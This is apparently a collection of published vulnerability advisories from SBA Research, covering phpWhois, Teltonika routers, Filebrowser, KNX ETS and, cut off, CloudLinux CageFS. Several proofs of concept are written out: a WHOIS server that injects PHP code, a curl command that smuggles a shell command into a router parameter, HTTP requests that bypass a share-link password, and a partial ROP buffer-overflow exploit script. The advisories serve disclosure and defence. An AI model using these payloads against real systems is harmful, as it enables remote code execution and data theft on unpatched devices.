vulnerability documented in this advisory, an 39 | attacker controlling the WHOIS information of a domain retrieved via 40 | phpWhois can execute arbitrary PHP code in the context of the 41 | application. The set of domains enabling this attack vector is limited 42 | to certain top-level domains. Sensitive data accessible by the 43 | application might get exposed through this attack. 44 | 45 | The vulnerability is fixed in version 5.1.0 or newer of jsmitty12's fork. 46 | We recommend upgrading to this version. 47 | 48 | ## Vulnerability Description ## 49 | 50 | phpWhois implements multiple generic parsers for WHOIS data in 51 | `whois.parser.php`. The parser implemented in function 52 | `generic_parser_b` is vulnerable to injection of PHP code. 53 | 54 | The function `generic_parser_b` builds a PHP statement from WHOIS data 55 | values by concatenating strings without proper sanitization. It then 56 | passes the statement to the `eval` function: 57 | 58 | ```php 59 | function generic_parser_b($rawdata, $items = array(), $dateformat = 'mdy', $hasreg = true, $scanall = false) { 60 | [...] 61 | foreach ($rawdata as $val) { 62 | if (trim($val) != '') { 63 | if (($val[0] == '%' || $val[0] == '#') && $disok) { 64 | $r['disclaimer'][] = trim(substr($val, 1)); 65 | $disok = true; 66 | continue; 67 | } 68 | $disok = false; 69 | reset($items); 70 | foreach ($items as $match => $field) { 71 | $pos = strpos($val, $match); 72 | if ($pos !== false) { 73 | if ($field != '') { 74 | $var = '$r' . getvarname($field); 75 | $itm = trim(substr($val, $pos + strlen($match))); 76 | if ($itm != '') 77 | eval($var . '="' . str_replace('"', '\"', $itm) . '";'); 78 | } 79 | if (!$scanall) 80 | break; 81 | } 82 | } 83 | } 84 | [...] 85 | } 86 | ``` 87 | 88 | At least the following 33 top-level domain handlers make use of the 89 | vulnerable parser: 90 | 91 | ```text 92 | ae, aero, ag, asia, au, bh, biz, cat, cn, co, co.za, fi, hu, in, info, jp, lu, me, mobi, museum, name, nz, org, pro, ru, sc, se, su, tel, travel, us, ws, xxx 93 | ``` 94 | 95 | ## Proof-of-Concept ## 96 | 97 | An attacker can exploit this vulnerability by setting malicious WHOIS 98 | information such as `Registrant Name: ${passthru('id')}` for an arbitrary 99 | `.org` domain. 100 | Instead of a real name, we specify `${passthru('id')}` which PHP will 101 | interpret as a variable expansion inside double quoted string literals. 102 | We simulate this situation via a simple WHOIS server implementation: 103 | 104 | ```py 105 | import SocketServer 106 | 107 | DATA = "Registrant Name: ${passthru('id')}\n" 108 | 109 | class WhoisHandler(SocketServer.BaseRequestHandler): 110 | def handle(self): 111 | self.request.recv(1024) 112 | print('Request received') 113 | self.request.sendall(DATA) 114 | print('Payload sent') 115 | 116 | if __name__ == '__main__': 117 | SocketServer.ThreadingTCPServer.allow_reuse_address = True 118 | server = SocketServer.ThreadingTCPServer(('127.0.0.1', 9999), WhoisHandler) 119 | server.serve_forever() 120 | ``` 121 | 122 | The following example sets up phpWhois to use the simulated WHOIS 123 | server and requests information for `example.org`: 124 | 125 | ```php 126 | useServer('org', '127.0.0.1:9999'); 131 | echo $whois->lookup('example.org'); 132 | ``` 133 | 134 | Therefore, the vulnerable phpWhois version executes the injected PHP 135 | statement `passthru('id')` which will execute the Unix `id` command on the 136 | server and return its output. 137 | 138 | ## Timeline ## 139 | 140 | * `2018-04-25`: identification of vulnerability 141 | * `2018-04-26`: initial contact of several phpWhois and fork maintainers 142 | * `2018-04-26`: disclosed vulnerability to phpwhois.org project maintainer 143 | * `2018-04-27`: disclosed vulnerability to jsmitty12 144 | * `2018-04-30`: phpwhois.org project maintainer stated that it is a 145 | known issue (CVE-2015-5243) with a fix committed at 146 | 147 | * `2018-04-30`: fix is not released yet and MITRE lists CVE-2015-5243 148 | as assigned but private 149 | * `2018-05-29`: jsmitty12 released fixed version 5.1.0 150 | * `2018-08-01`: public disclosure 151 | 152 | ## References ## 153 | 154 | * Original advisory: 155 | * Fixes: 156 | * 157 | * 158 | * 159 | 160 | ## Credits ## 161 | 162 | * Original advisory by Iain Wallace ([Nettitude](https://www.nettitude.com/)) 163 | * Rediscovered by David Gnedt ([SBA Research](https://www.sba-research.org/)) 164 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180319-02_Teltonika_Incorrect_Access_Control/README.md: -------------------------------------------------------------------------------- 1 | # Teltonika RUT9XX Missing Access Control to UART Root Terminal # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Teltonika RUT9XX routers with firmware before 00.04.233 provide a root 6 | terminal on a serial interface without proper access control. This 7 | allows attackers with physical access to execute arbitrary commands 8 | with root privileges. 9 | 10 | * **Identifier** : SBA-ADV-20180319-02 11 | * **Type of Vulnerability** : Incorrect Access Control 12 | * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) 13 | * **Vendor** : [Teltonika](https://teltonika.lt/) 14 | * **Affected Versions** : Firmware RUT9XX_R_00.04.199 and probably prior, 15 | newer firmware versions if settings were not cleared 16 | * **Fixed in Version** : RUT9XX_R_00.04.233 17 | * **CVE ID** : CVE-2018-17534 18 | * **CVSSv3 Vector** : CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 19 | * **CVSSv3 Base Score** : 6.8 (Medium) 20 | 21 | ## Vendor Description ## 22 | 23 | > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and 24 | > RS232/RS485 for professional applications. Router delivers high 25 | > performance, mission-critical cellular communication and GPS location 26 | > capabilities. 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | An attacker with physical access can fully compromise the device, by 33 | exploiting the vulnerabilities documented in this advisory. Sensitive 34 | data stored or transmitted via the device might get exposed through 35 | this attack. 36 | 37 | We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which 38 | includes fixes for the vulnerability described in this advisory. 39 | It is important to clear all settings during upgrade, for example, by 40 | disabling the "Keep all settings" checkbox while upgrading via the 41 | webinterface. Otherwise, newer firmware versions remain vulnerable. 42 | 43 | ## Vulnerability Description ## 44 | 45 | RUT9XX routers provide a UART/serial interface on two pins of an 46 | internal card-edge connector. 47 | 48 | * RX: Pin 1 - Rectangle-like pin on the top-side (CPU side) 49 | * TX: Pin 8 - Rectangle-like pin on the bottom-side 50 | 51 | The UART interface uses TTL-level and a baud rate of 115200. It 52 | provides log output and a root terminal without proper access control. 53 | 54 | ## Proof-of-Concept ## 55 | 56 | Our test device with firmware RUT9XX_R_00.04.172 provided the following 57 | log output during boot and after hitting the ENTER key: 58 | 59 | ```text 60 | *************************************** 61 | * U-Boot 3.0.1 2017-02-15 * 62 | *************************************** 63 | 64 | BOARD: Teltonika RUT9XX 65 | RAM: 128 MB DDR2 32-bit CL3-4-4-10 66 | FLASH: 16 MB Winbond W25Q128 67 | CLOCKS: CPU/RAM/AHB/SPI/REF 68 | 550/400/200/ 25/ 40 MHz 69 | 70 | Hit any key to stop booting: 0 71 | 72 | Booting image from 0x9F040000... 73 | 74 | Vendor/image name: Teltonika RUT9xx 75 | Hardware ID: 0x35000001 76 | Whole image size: 15.5 MB (16252928 bytes) 77 | Kernel size: 1.1 MB (1191732 bytes) 78 | Rootfs size: 9.7 MB (10170504 bytes) 79 | Kernel load address: 0x80060000 80 | Kernel entry point: 0x80060000 81 | 82 | Header CRC... skipped 83 | Data CRC... skipped 84 | 85 | Stopping network... OK! 86 | Uncompressing Kernel... OK! 87 | Starting kernel... 88 | 89 | [ 0.000000] Linux version 3.18.44 (simonas@Teltonika-I3) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r40569) ) #1 Tue Apr 10 15:23:49 EEST 2018 90 | [ 0.000000] bootconsole [early0] enabled 91 | [ 0.000000] CPU0 revision is: 0001974c (MIPS 74Kc) 92 | [ 0.000000] SoC: Atheros AR9344 rev 3 93 | [ 0.000000] Determined physical RAM map: 94 | [ 0.000000] memory: 08000000 @ 00000000 (usable) 95 | procd: Console is alive 96 | procd: - watchdog - 97 | procd: - preinit - 98 | procd: - early - 99 | procd: - watchdog - 100 | procd: - ubus - 101 | procd: - init - 102 | Please press Enter to activate this console. 103 | [ 20.140000] usb 1-1.3: new high-speed USB device number 4 using ehci-platform 104 | [ 20.280000] option 1-1.3:1.0: GSM modem (1-port) converter detected 105 | [ 20.280000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB1 106 | [ 20.290000] option 1-1.3:1.1: GSM modem (1-port) converter detected 107 | [ 20.300000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB2 108 | [ 20.310000] option 1-1.3:1.2: GSM modem (1-port) converter detected 109 | [ 20.310000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB3 110 | [ 20.320000] option 1-1.3:1.3: GSM modem (1-port) converter detected 111 | [ 20.330000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB4 112 | [ 20.360000] qmi_wwan 1-1.3:1.4: cdc-wdm0: USB WDM device 113 | [ 20.360000] qmi_wwan 1-1.3:1.4: Quectel EC21&EC25&EC20 R2.0 work on RawIP mode 114 | [ 20.370000] qmi_wwan 1-1.3:1.4 wwan0: register 'qmi_wwan' at usb-ehci-platform-1.3, WWAN/QMI device, xx:xx:xx:xx:xx:xx 115 | [ 22.280000] jffs2: notice: (1498) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found. 116 | [ 26.220000] device eth0 entered promiscuous mode 117 | [ 28.520000] eth0: link up (1000Mbps/Full duplex) 118 | [ 28.520000] br-lan: port 1(eth0) entered forwarding state 119 | [ 28.530000] br-lan: port 1(eth0) entered forwarding state 120 | [ 30.530000] br-lan: port 1(eth0) entered forwarding state 121 | [ 33.220000] Ports leds ON 122 | procd: - init complete - 123 | 124 | 125 | 126 | BusyBox v1.24.2 () built-in shell (ash) 127 | 128 | ____ _ ___ ____ _(_)_ 129 | | _ \ _ _| |_ / _ \/ ___| (_)@(_) 130 | | |_) | | | | __| | | \___ \ /(_) 131 | | _ <| |_| | |_| |_| |___) | \|/ 132 | |_| \_\\__,_|\__|\___/|____/ \|/ 133 | 134 | Teltonika RUT9XX 2014 - 2018 135 | 136 | root@router:/# id 137 | uid=0(root) gid=0(root) 138 | root@router:/# 139 | ``` 140 | 141 | ## Timeline ## 142 | 143 | * `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84 144 | * `2018-04-10` re-test of version RUT9XX_R_00.04.161 145 | * `2018-04-16` re-test of version RUT9XX_R_00.04.172 146 | * `2018-04-16` initial vendor contact through public address 147 | * `2018-04-18` vendor response with security contact 148 | * `2018-04-19` disclosed vulnerability to vendor security contact 149 | * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 150 | * `2018-07-09` notify vendor about incomplete fix 151 | * `2018-07-25` notify vendor about incomplete fix 152 | * `2018-09-25` request CVE from MITRE 153 | * `2018-09-26` MITRE assigned CVE-2018-17534 154 | * `2018-09-26` notify vendor about incomplete fix 155 | * `2018-10-03` vendor stated that clearing of settings is required 156 | * `2018-10-10` re-test of version RUT9XX_R_00.04.233 157 | * `2018-10-11` public disclosure 158 | 159 | ## References ## 160 | 161 | * Firmware Changelog: 162 | 163 | ## Credits ## 164 | 165 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 166 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Password Protection of Links Bypassable # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Files managed by Filebrowser can be shared with a link to external 6 | persons. While the application allows protecting those links with a password, 7 | the implementation is error-prone, making an incidental unprotected sharing 8 | of a file possible. 9 | 10 | * **Identifier** : SBA-ADV-20250327-02 11 | * **Type of Vulnerability** : Authentication Bypass 12 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 13 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 14 | * **Affected Versions** : <= 2.34.2 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2025-52996 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 18 | * **CVSS Base Score** : 3.1 (Low) 19 | 20 | ## Vendor Description ## 21 | 22 | > filebrowser provides a file managing interface within a specified directory 23 | > and it can be used to upload, delete, preview, rename and edit your files. 24 | > It allows the creation of multiple users and each user can have its own 25 | > directory. It can be used as a standalone app. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | File owners might rest in the assumption that their shared files are only 32 | accessible to persons knowing the defined password, giving them a false sense 33 | of security. Meanwhile, attackers gaining access to the unprotected link can 34 | use this information alone to download the possibly sensitive file. 35 | 36 | ## Vulnerability Description ## 37 | 38 | When sharing a file, the user is presented with a dialog asking for an 39 | optional password to protect the file share. The assumption of the user at 40 | this point would be, that the shared file won't be accessible without 41 | knowledge of the password. After clicking on `SHARE` the following dialog 42 | opens allowing the file's owner to copy the share-link: 43 | 44 | ![Dialog when sharing a file](images/filebrowser_sharedialog.png) 45 | 46 | In fact, there is not one, but two links offered: A `Download Link` and an 47 | unnamed second one. They have the following format: 48 | 49 | * `http://filebrowser.local:8080/share/6Gtw0xAw` 50 | * `http://filebrowser.local:8080/api/public/dl/6Gtw0xAw/dummy1.pdf?token=voDK6j[...]` 51 | 52 | Apparently, the first of the two share links is that one that users are 53 | supposed to actually share, while the second one is a direct download link 54 | not protected by the password. This behavior is not documented anywhere or 55 | explained in the GUI, though. 56 | 57 | There are multiple scenarios how an attacker might gain access to the 58 | unprotected link and, in consequence, to the shared file: 59 | 60 | * The file owner might incidentally share the second link instead of the 61 | first one, making it accessible to anyone having read access to the 62 | messaging system used (e.g., a mailserver). 63 | * After the legitimate receiver of the share has used the password, the 64 | unprotected link will get linked in multiple locations like the browser 65 | history or the log of a proxy server used. 66 | 67 | ## Proof of Concept ## 68 | 69 | Using the first link results in an authorization error if no password is 70 | provided, as expected: 71 | 72 | ```http hl:5 73 | GET /api/public/share/6Gtw0xAw HTTP/1.1 74 | Host: filebrowser.local:8080 75 | Referer: http://filebrowser.local:8080/share/6Gtw0xAw 76 | X-Auth: 77 | X-SHARE-PASSWORD: 78 | [...] 79 | 80 | HTTP/1.1 401 Unauthorized 81 | Cache-Control: no-cache, no-store, must-revalidate 82 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 83 | Content-Type: text/plain; charset=utf-8 84 | X-Content-Type-Options: nosniff 85 | Date: Thu, 27 Mar 2025 10:59:12 GMT 86 | Content-Length: 17 87 | 88 | 401 Unauthorized 89 | ``` 90 | 91 | Only if the password is provided (via the `X-SHARE-PASSWORD` header), a 92 | proper response is given: 93 | 94 | ```http hl:5 95 | GET /api/public/share/6Gtw0xAw HTTP/1.1 96 | Host: filebrowser.local:8080 97 | Referer: http://filebrowser.local:8080/share/6Gtw0xAw 98 | X-Auth: 99 | X-SHARE-PASSWORD: 1234 100 | [...] 101 | 102 | HTTP/1.1 200 OK 103 | Cache-Control: no-cache, no-store, must-revalidate 104 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 105 | Content-Type: application/json; charset=utf-8 106 | Date: Thu, 27 Mar 2025 10:59:15 GMT 107 | Content-Length: 301 108 | 109 | {"path":"","name":"dummy1.pdf","size":7703,"extension":".pdf","modified":"2025-03-27T15:11:45.101242449Z","mode":420,"isDir":false,"isSymlink":false,"type":"pdf","token":"voDK6j[...]"} 110 | ``` 111 | 112 | But it does not return the actual file content but rather an access token. 113 | This is the very same token that is already part of the second share URL and 114 | is used by the web application to recreate the actual download URL. If you 115 | are in possession of that one, no further password check is performed, and 116 | the content of the file is returned: 117 | 118 | ```http 119 | GET /api/public/dl/6Gtw0xAw?inline=true&token=voDK6j[...] HTTP/1.1 120 | Host: filebrowser.local:8080 121 | Referer: http://filebrowser.local:8080/share/6Gtw0xAw 122 | [...] 123 | 124 | HTTP/1.1 200 OK 125 | Accept-Ranges: bytes 126 | Cache-Control: private 127 | Content-Disposition: inline 128 | Content-Length: 7703 129 | Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'; 130 | Content-Security-Policy: script-src 'none'; 131 | Content-Type: application/pdf 132 | Last-Modified: Mon, 03 Mar 2025 15:11:45 GMT 133 | Date: Thu, 27 Mar 2025 10:59:18 GMT 134 | 135 | %PDF-1.4 136 | %Ç쏢 137 | %%Invocation: path/gs -P- -dSAFER -dCompatibilityLevel=1.4 -q -P- -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sstdout=? -sOutputFile=? -P- -dSAFER -dCompatibilityLevel=1.4 - 138 | 5 0 obj 139 | [...] 140 | ``` 141 | 142 | ## Recommended Countermeasures ## 143 | 144 | A short time solution would be to simply remove the second link from the GUI 145 | when a password protected share is created. Doing so will be a proper defense 146 | against user errors, but it will still leave unprotected links in various 147 | logs. A thorough fix has to eliminate the unprotected links completely, 148 | access to the file must only be given to requests containing the share 149 | password. 150 | 151 | ## Timeline ## 152 | 153 | * `2025-03-27` Identified the vulnerability in version 2.32.0 154 | * `2025-04-11` Contacted the project 155 | * `2025-04-29` Vulnerability disclosed to the project 156 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 157 | * `2025-06-26` CVE ID assigned by GitHub 158 | * `2025-06-29` Partial fix released with version 2.34.2 (passwordless link 159 | not shown anymore); GitHub issue #5239 opened to track the remaining fix 160 | * `2025-06-29` Advisory published by project as `GHSA-3v48-283x-f2w4` 161 | 162 | ## References ## 163 | 164 | * CWE-305: Authentication Bypass by Primary Weakness: 165 | * GitHub Security Advisory: 166 | * GitHub Issue: 167 | 168 | ## Credits ## 169 | 170 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 171 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180319-01_Teltonika_OS_Command_Injection/README.md: -------------------------------------------------------------------------------- 1 | # Teltonika RUT9XX Unauthenticated OS Command Injection # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Teltonika RUT9XX routers with firmware before 00.04.233 are prone to 6 | multiple unauthenticated OS command injection vulnerabilities in 7 | `autologin.cgi` and `hotspotlogin.cgi` due to insufficient user input 8 | sanitization. This allows remote attackers to execute arbitrary 9 | commands with root privileges. 10 | 11 | * **Identifier** : SBA-ADV-20180319-01 12 | * **Type of Vulnerability** : OS Command Injection 13 | * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) 14 | * **Vendor** : [Teltonika](https://teltonika.lt/) 15 | * **Affected Versions** : Firmware RUT9XX_R_00.04.172 and probably prior 16 | * **Fixed in Version** : RUT9XX_R_00.04.233 17 | * **CVE ID** : CVE-2018-17532 18 | * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 19 | * **CVSSv3 Base Score** : 9.8 (Critical) 20 | 21 | ## Vendor Description ## 22 | 23 | > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and 24 | > RS232/RS485 for professional applications. Router delivers high 25 | > performance, mission-critical cellular communication and GPS location 26 | > capabilities. 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | An attacker can fully compromise the device, by exploiting the 33 | vulnerabilities documented in this advisory. Sensitive data stored or 34 | transmitted via the device might get exposed through this attack. 35 | 36 | We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which 37 | includes fixes for the vulnerabilities described in this advisory. 38 | 39 | ## Vulnerability Description ## 40 | 41 | Several parameters of the scripts `autologin.cgi` and `hotspotlogin.cgi` 42 | are affected by OS command injection vulnerabilities. The scripts are 43 | part of the coova-chilli captive portal. However, the vulnerabilities 44 | are exploitable regardless of the device configuration, even if no 45 | captive portal is configured. 46 | 47 | More concretely, the following parameters are vulnerable: 48 | 49 | * `/cgi-bin/autologin.cgi` 50 | * reply 51 | * uamport 52 | * challenge 53 | * userurl 54 | * res 55 | * reason 56 | * *If* res=success 57 | * uamip 58 | * uamport 59 | * userurl 60 | * `/cgi-bin/hotspotlogin.cgi` 61 | * *If* send=1 62 | * uamip 63 | * TelNum 64 | * challenge 65 | * uamport 66 | * userurl 67 | * *If* button=1 or (res=wispr and UserName=1) 68 | * uamport 69 | * uamip 70 | * *If* res=success or res=already or res=popup2 71 | * uamip 72 | * uamport 73 | * *If* res=logoff or res=popup3 74 | * uamip 75 | * uamport 76 | 77 | The affected scripts use these parameters to build OS commands via 78 | string concatenation without proper sanitization. 79 | 80 | The vulnerabilities are located in the source files `hotspotlogin.cgi` 81 | and `landing_page_functions.lua`, which is included from `autologin.cgi` 82 | and `hotspotlogin.cgi`. 83 | 84 | The `landing_page_functions.lua` script provides multiple functions, 85 | which are either vulnerable to OS command injection themselves or 86 | propagate insecure usage. 87 | 88 | For example, it provides the function `getParam`, which directly passes 89 | the argument to `io.popen`: 90 | 91 | ```lua 92 | [...] 93 | function getParam(string) 94 | local h = io.popen(string) 95 | local t = h:read() 96 | h:close() 97 | return t 98 | end 99 | [...] 100 | ``` 101 | 102 | `landing_page_functions.lua` also provides the functions `debug` and 103 | `get_ifname`, which use `os.execute` and `getParam` in an insecure way: 104 | 105 | ```lua 106 | [...] 107 | function debug(string) 108 | if debug_enable == 1 then 109 | os.execute("/usr/bin/logger -t hotspotlogin.cgi \""..string.."\"") 110 | end 111 | end 112 | [...] 113 | function get_ifname(ip) 114 | local result = getParam(format("ip addr | grep \"%s\"", ip)) 115 | local tun = string.match(result, "(tun%d+)") 116 | local ifname = "wlan0" 117 | [...] 118 | ``` 119 | 120 | For example, `hotspotlogin.cgi` makes use of the functions `get_ifname` and 121 | `getParam`. Occasionally, it also insecurely uses `os.execute` directly: 122 | 123 | ```lua 124 | [...] 125 | if send and send ~= "" and tel_num then 126 | local ifname = get_ifname(uamip) 127 | local pass = generate_code(ifname) or "0000" 128 | tel_num = tel_num:gsub("%%2B", "+") 129 | local exists = getParam("grep \"" ..tel_num.. "\" /etc/chilli/" .. ifname .. "/smsusers") 130 | local user = string.format("%s", pass) 131 | local uri = os.getenv("REQUEST_URI") 132 | local message = string.format("%s Password - %s \n Link - http://%s%s?challenge=%s&uamport=%s&uamip=%s&userurl=%s&UserName=%s&button=1", tel_num, pass, uamip, uri, challenge, uamport, uamip, userurl, pass) 133 | local smsotp_mesg=string.format("%s;%s", tel_num, pass) 134 | message = getParam(string.format("/usr/sbin/gsmctl -Ss \"%s\"", message)) 135 | 136 | if message == "OK" then 137 | os.execute("echo \""..smsotp_mesg.."\" >> /tmp/smsotp.log") 138 | sms = "sent" 139 | if exists then 140 | os.execute("sed -i 's/" ..exists.. "/" ..user.. "/g' /etc/chilli/" .. ifname .. "/smsusers") 141 | else 142 | os.execute("echo \"" ..user.. "\" >>/etc/chilli/" .. ifname .. "/smsusers") 143 | end 144 | [...] 145 | ``` 146 | 147 | In one of the first lines of the above code snippet, `hotspotlogin.cgi` 148 | calls `get_ifname` with unsanitized user input from the parameter 149 | `uamip`. A few lines later it calls `getParam` with unsanitized user 150 | input from the parameter `TelNum`. In a further call to `getParam` it 151 | uses more unsanitized user input. 152 | 153 | There are futher locations that call insecure functions like `debug` 154 | and `get_ifname` either directly or indirectly with user input from the 155 | scripts `autologin.cgi` and `hotspotlogin.cgi`. 156 | 157 | ## Proof-of-Concept ## 158 | 159 | For example, an attacker can exploit this vulnerability by manipulating 160 | the `uamip` parameter: 161 | 162 | ```sh 163 | curl -v -o /dev/null "http://$IP/cgi-bin/hotspotlogin.cgi" -d 'send=1&uamip="; id >/tmp/test #' 164 | ``` 165 | 166 | The device executes the commands with root privileges: 167 | 168 | ```bash 169 | # cat /tmp/test 170 | uid=0(root) gid=0(root) 171 | ``` 172 | 173 | ## Timeline ## 174 | 175 | * `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84 176 | * `2018-04-10` detailed analysis of version RUT9XX_R_00.04.161 177 | * `2018-04-16` re-test of version RUT9XX_R_00.04.172 178 | * `2018-04-16` initial vendor contact through public address 179 | * `2018-04-18` vendor response with security contact 180 | * `2018-04-19` disclosed vulnerability to vendor security contact 181 | * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 182 | * `2018-07-09` re-test of version RUT9XX_R_00.05.00.5 183 | * `2018-09-25` request CVE from MITRE 184 | * `2018-09-26` MITRE assigned CVE-2018-17532 185 | * `2018-10-11` public disclosure 186 | 187 | ## References ## 188 | 189 | * Firmware Changelog: 190 | 191 | ## Credits ## 192 | 193 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 194 | -------------------------------------------------------------------------------- /2015/knAx_20150101/README.md: -------------------------------------------------------------------------------- 1 | # Remote code execution vulnerability in the KNX management software ETS # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | * **Identifier** : knAx_20150101 6 | * **Type of Vulnerability** : Buffer overflow vulnerability 7 | * **Software/Product Name** : ETS (Engineering Tool Software) 8 | * **Vendor** : KNX Association 9 | * **Affected Versions** : ETS 4.1.5 (Build 3246) 10 | : *no other versions tested* 11 | * **Fixed in Version** : *unknown* 12 | * **CVE ID** : CVE-2015-8299 13 | * **Impact** : Critical 14 | 15 | ## Vulnerability Description ## 16 | 17 | The vulnerability is caused by a buffer overflow in a memcpy 18 | operation when parsing specailly crafted KNXnet/IP packets in the 19 | Group messages monitor (aka. Falcon). An according proof-of-concept 20 | exploit which was tested on an affected ETS version installed on a 21 | Windows XP SP3 can be found below. The proof-of-concept exploit 22 | generates the UDP packet which triggers the vulnerability and should 23 | at least crash the application (it requires python and scapy to run). 24 | 25 | ## Proof-of-Concept ## 26 | 27 | Since this is just a PoC the ROP chain was not carefully selected and 28 | might require adaptation to reproduce the desired results on your system. 29 | 30 | `knAx.py`: 31 | 32 | ```python 33 | #!/usr/bin/env python 34 | """ ETS4 buffer overflow exploit PoC 35 | 36 | This is a Proof-of-Concept (PoC) remote exploit of a ETS4 which is 37 | currently running the monitoring software for group messages aka. 38 | "Groupenmonitor". This feature of the ETS4 runs an executable called 39 | "Falcon.exe" which is vulnerable to a buffer overflow. 40 | 41 | The vulnerable function gets called at: 42 | 0043C994 call overflow_43C743 43 | This function, which is responsible for the overflow, is located at 0x43c743. 44 | The "memcpy" which produces the overflow gets called at: 45 | 0043C931 call memcpy 46 | 47 | Vulnerable version: 48 | ETS 4.1.5 (Build 3246) 49 | Stammdaten: Version 57, Schema 1.1 50 | registry key: "NET Framework Setup" 51 | v2.0.50727 -version 2.2.30729 52 | v4 -version 4.0.30319 53 | 54 | ETS4.exe 55 | LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium 56 | Assembly Version: 4.1.3246.36180 57 | InternalName: ETS4.exe 58 | FileVersion: 4.1.3246.36180 59 | CompanyName: KNX Association cvba 60 | Comments: ETS4 Application 61 | ProductName: ETS4 62 | ProductVersion: 4.1.3246.36180 63 | FileDescription: ETS4 64 | OriginalFilename: ETS4.exe 65 | 66 | Falcon.exe 67 | LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium 68 | InternalName: Falcon 69 | FileVersion: 2.0.5184.4346 70 | CompanyName: KNX Association 71 | SpecialBuild: 2011.01.16 72 | LegalTrademarks: KNX Association 73 | OLESelfRegister: 74 | ProductVersion: 2.0 75 | FileDescription: Falcon 76 | OriginalFilename: Falcon.ex 77 | 78 | Tested on: 79 | Windows XP SP3 32bit 80 | 81 | This exploit uses return-oriented-programming techniques. The gadgets used for ROP are: 82 | ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | " 83 | ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | " 84 | ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | " 85 | user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | " 86 | 87 | The exploit requires root privelages to send the crafted packet and 88 | the scapy python module! 89 | 90 | PoC and vuln. discovery 91 | by aljosha judmayer 92 | """ 93 | from struct import pack,unpack 94 | from scapy.all import * 95 | 96 | # --- variables --- 97 | ip_dest = "224.0.23.12" 98 | udp_dport = 3671 99 | udp_sport = 3671 100 | sys_iface = "vboxnet0" # <= CHANGE ME! to external network interface 101 | # --- 102 | knxhdr="\x06\x10\x05\x30\x01\xb2" 103 | knxmsg="\xac\x01\x81\xa9\xe3\xac\xcb\x44\xff\xa2\x67\xcd\x03\x6f\x05\xe4\x58\x19\xae\x65\x1b\x14\x38\x4d\x83\x60\x06" 104 | padding="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 105 | 106 | def test(): 107 | """ this should terminate the Falcon.exe process """ 108 | exit="\xfa\xca\x81\x7c" # ExitProcess 0x7c81cafa, or 0xffffffff for seg fault 109 | 110 | sendpayload(knxhdr + knxmsg + padding + exit) 111 | return 112 | 113 | def exploit(): 114 | """ 115 | This constructs a ROP payload and sends it. 116 | Because of stack manipulation after the overflow we need to jump 117 | over some bytes. Therefore the esp is increased. 118 | """ 119 | 120 | eip = pack(" 191 | * KNX Association: 192 | 193 | ## Credits ## 194 | 195 | * Aljosha Judmayer ([SBA Research](https://www.sba-research.org/)) 196 | -------------------------------------------------------------------------------- /2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands/README.md: -------------------------------------------------------------------------------- 1 | # CloudLinux CageFS Insufficiently Restricted Proxy Command # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths 6 | supplied to the `sendmail` proxy command. This allows local users to read 7 | and write arbitrary files of certain file formats outside the CageFS 8 | environment. 9 | 10 | * **Identifier** : SBA-ADV-20200707-02 11 | * **Type of Vulnerability** : External Control of File Name or Path 12 | * 